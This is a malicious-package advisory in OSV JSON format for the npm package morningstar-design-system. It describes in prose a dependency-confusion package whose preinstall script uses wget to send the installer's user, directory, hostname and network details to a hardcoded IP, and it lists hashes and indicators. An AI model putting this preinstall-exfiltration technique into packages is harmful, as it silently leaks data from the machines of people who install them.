{"id":"MAL-2026-5449","summary":"Malicious code in morningstar-design-system (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e)\nOn `npm install`, the package's `preinstall` lifecycle script runs `wget` against a hardcoded bare-IP HTTP endpoint, passing the output of `id`, `pwd`, `hostname`, and `ip a` as URL query parameters. This leaks the installing user's username/UID/GID, working directory, hostname, and full network interface configuration to an attacker-controlled host automatically, before any other code runs. The package name targets Morningstar's organizational namespace and is published at an absurd `99.0.1` version — the canonical dependency-confusion shape designed to override an internal package of the same name. README self-identifies as a dependency-confusion PoC. Whether labeled research or not, the published artifact actively exfiltrates installer data to a third-party IP and is unsafe to install in any environment.\n","modified":"2026-06-09T19:01:29.458566023Z","published":"2026-06-09T17:34:46Z","database_specific":{"malicious-packages-origins":[{"sha256":"18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e","id":"IN-MAL-2026-005075","source":"amazon-inspector","import_time":"2026-06-09T17:45:52.969057726Z","modified_time":"2026-06-09T17:35:31Z","versions":["99.0.1"]},{"versions":["99.0.2"],"id":"IN-MAL-2026-005066","source":"amazon-inspector","import_time":"2026-06-09T17:45:52.33397188Z","modified_time":"2026-06-09T17:34:46Z","sha256":"b7c142e1dbd0c447de86c8f45555623eec0ca091eb202b435865aaa5688c76de"},{"sha256":"06a27dd57899084595fca32ae35722b70847a43879cb19a17b1d21f95fb6840a","id":"IN-MAL-2026-005123","source":"amazon-inspector","import_time":"2026-06-09T18:50:17.395581784Z","modified_time":"2026-06-09T17:45:56Z","versions":["99.0.0"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/morningstar-design-system/v/99.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/morningstar-design-system/v/99.0.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/morningstar-design-system/v/99.0.0"}],"affected":[{"package":{"name":"morningstar-design-system","ecosystem":"npm","purl":"pkg:npm/morningstar-design-system"},"versions":["99.0.1","99.0.2","99.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/morningstar-design-system/MAL-2026-5449.json","indicators":{"package_integrity":[{"filename":"morningstar-design-system-99.0.1.tgz","hashes":{"sha1":"fbc61e4d181354b087d7a4032de79a54c8a60af0","sha512_sri":"sha512-mRsaNIScm4W4V3+d8aD0yP2L6SJP1khxHgzZLKbfQjtLgdvzUTL2LthDKCDIZBr1gHl+oomciLUs1ALrhj9r1g=="}}],"evidence_files":[{"sha256":"c6baf6fd432a663cf231f93848d0286121864c60d167e54e64c6e8c819584fa2","tlsh":"c611ef78d730ad330fe50ae0947a12167673fae78d066c1da6d2100fdb0e9d3207c01a","path":"package.json"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}